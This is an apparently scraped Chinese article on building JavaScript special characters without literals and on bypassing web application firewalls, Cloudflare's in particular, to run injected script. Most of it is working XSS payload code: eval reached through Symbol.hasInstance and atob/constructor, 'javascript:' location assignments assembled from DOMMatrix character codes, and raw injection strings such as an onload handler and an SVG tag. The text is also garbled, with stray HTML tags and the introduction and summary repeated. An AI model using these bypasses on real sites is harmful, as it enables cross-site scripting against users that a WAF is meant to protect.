JS 生成字符及Bypass WAF技术研究<\/h1>

前言<\/h2>
本文探讨了JavaScript中生成特殊字符的各种技术以及绕过Web应用防火墙(WAF)的方法，结合了Twitter和Reddit上安全研究人员的创新技术。<\/p>

生成特殊字符技术<\/h2>

1. 生成

\/code\/<\/code>字符串<\/h3>
var<\/span> bs<\/span> =<\/span> 'ao0PTA7YWxlcnQoMTMzNykvLwa'<\/span>;
<\/span><\/span>empty<\/span> =<\/span> RegExp.prototype<\/span>.flags<\/span>;
<\/span><\/span>xx<\/span> =<\/span> {};
<\/span><\/span>xx<\/span>.source<\/span> =<\/span> bs<\/span>;
<\/span><\/span>xx<\/span>.flags<\/span> =<\/span> empty<\/span>;
<\/span><\/span>xx<\/span>.toString<\/span> =<\/span> RegExp.prototype<\/span>.toString<\/span>;
<\/span><\/span><\/code><\/pre>2. 生成特殊符号(<\/code>, ?<\/code>, :<\/code>, )<\/code><\/h3>
yy<\/span> =<\/span> {...RegExp.prototype<\/span>.source<\/span>}
<\/span><\/span>yy<\/span>.toString<\/span> =<\/span> Array.prototype<\/span>.shift<\/span>
<\/span><\/span>yy<\/span>.length<\/span> =<\/span> 4<\/span>
<\/span><\/span>left<\/span> =<\/span> yy<\/span> +<\/span> empty<\/span>             \/\/ 生成(
<\/span><\/span><\/span><\/span>que<\/span> =<\/span> yy<\/span> +<\/span> empty<\/span>              \/\/ 生成?
<\/span><\/span><\/span><\/span>colon<\/span> =<\/span> yy<\/span> +<\/span> empty<\/span>            \/\/ 生成:
<\/span><\/span><\/span><\/span>right<\/span> =<\/span> yy<\/span> +<\/span> empty<\/span>            \/\/ 生成)
<\/span><\/span><\/span><\/code><\/pre>3. 生成斜杠\/<\/code><\/h3>
x<\/span> =<\/span> console<\/span>;
<\/span><\/span>x<\/span>.toString<\/span> =<\/span> RegExp.prototype<\/span>.toString<\/span>;
<\/span><\/span>x<\/span>.valueOf<\/span> =<\/span> String.prototype<\/span>.charAt<\/span>;
<\/span><\/span>x<\/span> +<\/span> ""<\/span> \/\/ 输出\/
<\/span><\/span><\/span><\/code><\/pre>4. 生成方括号[<\/code><\/h3>
x<\/span> =<\/span> console<\/span>
<\/span><\/span>x<\/span>.valueOf<\/span> =<\/span> String.prototype<\/span>.charAt<\/span>
<\/span><\/span>x<\/span> +<\/span> ""<\/span> \/\/ 输出[
<\/span><\/span><\/span><\/code><\/pre>5. 字符串大小写转换<\/h3>
x<\/span> =<\/span> ["a"<\/span>]
<\/span><\/span>x<\/span>.valueOf<\/span> =<\/span> String.prototype<\/span>.toUpperCase<\/span>
<\/span><\/span>x<\/span> +<\/span> ""<\/span> \/\/ 输出A
<\/span><\/span><\/span><\/code><\/pre>Bypass WAF技术<\/h2>
1. 使用展开符和正则绕过单引号<\/h3>
x<\/span> =<\/span> {...eval+<\/span>0<\/span>, toString<\/span>:<\/span>Array.prototype<\/span>.shift<\/span>, length<\/span>:<\/span>15<\/span>},
<\/span><\/span>x<\/span>+<\/span>x<\/span>+<\/span>x<\/span>+<\/span>x<\/span>+<\/span>x<\/span>+<\/span>x<\/span>+<\/span>x<\/span>+<\/span>x<\/span>+<\/span>x<\/span>+<\/span>x<\/span>+<\/span>x<\/span>+<\/span>x<\/span>+<\/span>x<\/span>,
<\/span><\/span>x<\/span> =<\/span> \/alert\/<\/span>.source<\/span> +<\/span> x<\/span> +<\/span> 1337<\/span> +<\/span> x<\/span>;
<\/span><\/span>location<\/span> =<\/span> \/javascript:\/<\/span>.source<\/span> +<\/span> x<\/span>;
<\/span><\/span><\/code><\/pre>2. 使用instanceof<\/h3>
window[Symbol<\/span>.hasInstance<\/span>] =<\/span> eval
<\/span><\/span>atob<\/span>`YWxlcnQoMSk`<\/span> instanceof<\/span> window
<\/span><\/span><\/code><\/pre>3. 使用constructor<\/h3>
atob<\/span>.constructor<\/span>(atob<\/span>`YWxlcnQoMSk`<\/span>)``<\/span>
<\/span><\/span>\/\/ 或
<\/span><\/span><\/span><\/span>atob<\/span>.constructor<\/span>(atob<\/span>(\/YWxlcnQoMSk\/<\/span>.source<\/span>))()
<\/span><\/span><\/code><\/pre>4. 使用新特性<\/h3>
void<\/span>''<\/span>??<\/span>globalThis<\/span>?<\/span>.alert<\/span>?<\/span>.(...[0b1<\/span>_0_1_0_0_1_1_1_0_0_1<\/span>,],)
<\/span><\/span><\/code><\/pre>绕过CloudFlare WAF的思考<\/h2>
CloudFlare的WAF会拦截以下特征：<\/p>

括号<\/li>
注释符<\/li>
模板字符<\/li>
大括号<\/li>
特定关键字（如location赋值）<\/li>
<\/ul>
已知可用的简单payload<\/h3>
"><body\/onload="throw%20onerror=alert,1,2,3,11;"><a+href="
<\/code><\/pre>
高级技术（可能被拦截）<\/h3>
使用DOMMatrix构造JavaScript代码：<\/p>
x<\/span> =<\/span> new<\/span> DOMMatrix<\/span>;
<\/span><\/span>matrix<\/span> =<\/span> String.fromCharCode<\/span>;
<\/span><\/span>i<\/span> =<\/span> new<\/span> DOMMatrix<\/span>;
<\/span><\/span>i<\/span>.a<\/span> =<\/span> 106<\/span>; \/\/ j
<\/span><\/span><\/span><\/span>i<\/span>.b<\/span> =<\/span> 97<\/span>;  \/\/ a
<\/span><\/span><\/span><\/span>i<\/span>.c<\/span> =<\/span> 118<\/span>; \/\/ v
<\/span><\/span><\/span><\/span>i<\/span>.d<\/span> =<\/span> 97<\/span>;  \/\/ a
<\/span><\/span><\/span><\/span>i<\/span>.e<\/span> =<\/span> 115<\/span>; \/\/ s
<\/span><\/span><\/span><\/span>i<\/span>.f<\/span> =<\/span> 99<\/span>;  \/\/ c
<\/span><\/span><\/span><\/span>j<\/span> =<\/span> new<\/span> DOMMatrix<\/span>;
<\/span><\/span>j<\/span>.a<\/span> =<\/span> 114<\/span>; \/\/ r
<\/span><\/span><\/span><\/span>j<\/span>.b<\/span> =<\/span> 105<\/span>; \/\/ i
<\/span><\/span><\/span><\/span>j<\/span>.c<\/span> =<\/span> 112<\/span>; \/\/ p
<\/span><\/span><\/span><\/span>j<\/span>.d<\/span> =<\/span> 116<\/span>; \/\/ t
<\/span><\/span><\/span><\/span>j<\/span>.e<\/span> =<\/span> 58<\/span>;  \/\/ :
<\/span><\/span><\/span><\/span>j<\/span>.f<\/span> =<\/span> 32<\/span>;  \/\/ space
<\/span><\/span><\/span><\/span>x<\/span>.a<\/span> =<\/span> 97<\/span>;  \/\/ a
<\/span><\/span><\/span><\/span>x<\/span>.b<\/span> =<\/span> 108<\/span>; \/\/ l
<\/span><\/span><\/span><\/span>x<\/span>.c<\/span> =<\/span> 101<\/span>; \/\/ e
<\/span><\/span><\/span><\/span>x<\/span>.d<\/span> =<\/span> 114<\/span>; \/\/ r
<\/span><\/span><\/span><\/span>x<\/span>.e<\/span> =<\/span> 116<\/span>; \/\/ t
<\/span><\/span><\/span><\/span>x<\/span>.f<\/span> =<\/span> 40<\/span>;  \/\/ (
<\/span><\/span><\/span><\/span>y<\/span> =<\/span> new<\/span> DOMMatrix<\/span>;
<\/span><\/span>y<\/span>.a<\/span> =<\/span> 49<\/span>;  \/\/ 1
<\/span><\/span><\/span><\/span>y<\/span>.b<\/span> =<\/span> 51<\/span>;  \/\/ 3
<\/span><\/span><\/span><\/span>y<\/span>.c<\/span> =<\/span> 51<\/span>;  \/\/ 3
<\/span><\/span><\/span><\/span>y<\/span>.d<\/span> =<\/span> 55<\/span>;  \/\/ 7
<\/span><\/span><\/span><\/span>y<\/span>.e<\/span> =<\/span> 41<\/span>;  \/\/ )
<\/span><\/span><\/span><\/span>y<\/span>.f<\/span> =<\/span> 59<\/span>;  \/\/ ;
<\/span><\/span><\/span><\/span>location<\/span> =<\/span> 'javascript:a='<\/span> +<\/span> i<\/span> +<\/span> '+'<\/span> +<\/span> j<\/span> +<\/span> '+'<\/span> +<\/span> x<\/span> +<\/span> '+'<\/span> +<\/span> y<\/span> +<\/span> ';location=a;void 1'<\/span>;
<\/span><\/span><\/code><\/pre>CloudFlare拦截的变通方案尝试<\/h3>
以下方法可能被拦截：<\/p>
a<\/span> =<\/span> location<\/span>;
<\/span><\/span>a<\/span>.href<\/span> =<\/span> "javascript:alert(1)"<\/span>;
<\/span><\/span>\/\/ 或
<\/span><\/span><\/span><\/span>a<\/span>.search<\/span> =<\/span> "?id=javascript:alert(1);"<\/span>;
<\/span><\/span>\/\/ 或
<\/span><\/span><\/span><\/span>a<\/span>.pathname<\/span> =<\/span> "\/index\/index.php?id=javascript:alert(1);"<\/span>;
<\/span><\/span><\/code><\/pre>其他可能的绕过方式<\/h3>
<svg ono onload=alert(1)>
<\/code><\/pre>
总结<\/h2>
本文介绍了多种生成JavaScript特殊字符的技术和绕过WAF的方法，特别是针对CloudFlare的防护机制。这些技术展示了JavaScript语言的灵活性和安全防护的挑战性。实际应用中需要根据具体WAF规则进行调整和测试。<\/p>

JS 生成字符及Bypass WAF技术研究<\/h1>

前言<\/h2> 本文探讨了JavaScript中生成特殊字符的各种技术以及绕过Web应用防火墙(WAF)的方法，结合了Twitter和Reddit上安全研究人员的创新技术。<\/p>

生成特殊字符技术<\/h2>

Bypass WAF技术<\/h2>

总结<\/h2> 本文介绍了多种生成JavaScript特殊字符的技术和绕过WAF的方法，特别是针对CloudFlare的防护机制。这些技术展示了JavaScript语言的灵活性和安全防护的挑战性。实际应用中需要根据具体WAF规则进行调整和测试。<\/p>

前言<\/h2>
本文探讨了JavaScript中生成特殊字符的各种技术以及绕过Web应用防火墙(WAF)的方法，结合了Twitter和Reddit上安全研究人员的创新技术。<\/p>

总结<\/h2>
本文介绍了多种生成JavaScript特殊字符的技术和绕过WAF的方法，特别是针对CloudFlare的防护机制。这些技术展示了JavaScript语言的灵活性和安全防护的挑战性。实际应用中需要根据具体WAF规则进行调整和测试。<\/p>